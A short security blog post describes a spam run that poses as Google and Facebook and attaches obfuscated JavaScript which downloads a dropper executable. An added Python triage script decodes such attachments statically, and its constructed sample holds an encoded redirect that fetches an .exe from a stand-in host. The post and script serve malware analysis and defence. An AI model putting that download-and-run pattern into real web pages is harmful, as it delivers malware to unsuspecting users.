Holiday season malware

Our spam traps started to receive a large number of plain-text spam emails. The emails pretend to come from “Google and Facebook” and use the sender address info@facebook.com. The attachment, which is 810 bytes in size, is an HTML document containing some obfuscated JavaScript.

Considering these mails a “deja-vu”, I was preparing to just close and ignore them, but the JavaScript looked interesting. Once unescaped, the code downloads the executable file “Google.information.exe”, which is detected as TR/Dropper.Gen by Avira anti-malware solutions.
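
A static triage sketch for this kind of attachment, added here as an example and not taken from the original post or from Avira tooling: it decodes `unescape("...")` literals without executing the script and lists any URL whose path ends in an executable extension. It assumes the obfuscation is the percent-escaping that JavaScript's `unescape()` reverses; the sample attachment, the host `example.invalid` and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# JavaScript unescape() turns %XX and %uXXXX into single code units (not UTF-8),
# so urllib.parse.unquote is not an exact equivalent; decode by hand instead.
_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
_URL = re.compile(r"https?://[^\s'\"<>]+", re.I)
_EXE = re.compile(r"\.(exe|scr|pif)$", re.I)

# Constructed sample attachment (not the real one from the spam run).
SAMPLE = (
    '<html><body><script>eval(unescape("window.location%3D%22http%3A%2F%2F'
    'example.invalid%2FGoogle.information.exe%22%3B"));</script></body></html>'
)

def js_unescape(s):
    """Decode %XX / %uXXXX the way JavaScript unescape() does."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def peel(html, max_layers=5):
    """Return each decoded layer found in unescape() string literals.

    Nothing is executed; nested unescape() calls are followed up to
    max_layers so a looping or very deep sample cannot stall the scan.
    """
    layers, pending = [], [html]
    for _ in range(max_layers):
        decoded = [js_unescape(m.group(2))
                   for text in pending for m in _CALL.finditer(text)]
        if not decoded:
            break
        layers.extend(decoded)
        pending = decoded
    return layers

def triage(html):
    """Summarise what the hidden script would fetch."""
    layers = peel(html)
    urls = sorted({u for text in layers for u in _URL.findall(text)})
    executables = [u for u in urls if _EXE.search(urlparse(u).path)]
    return {"layers": len(layers), "urls": urls, "executables": executables}

if __name__ == "__main__":
    print(triage(SAMPLE))
```
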

I would like to point out again here that nothing in this world comes for free. Do not let yourself get fooled by such prizes – those are really weird, by the way, as Google Maps relies on GPS in the smartphone already, for example; and Google Chrome OS will be free anyway as soon as it gets released!

Sorin Mustaca
Data Security Expert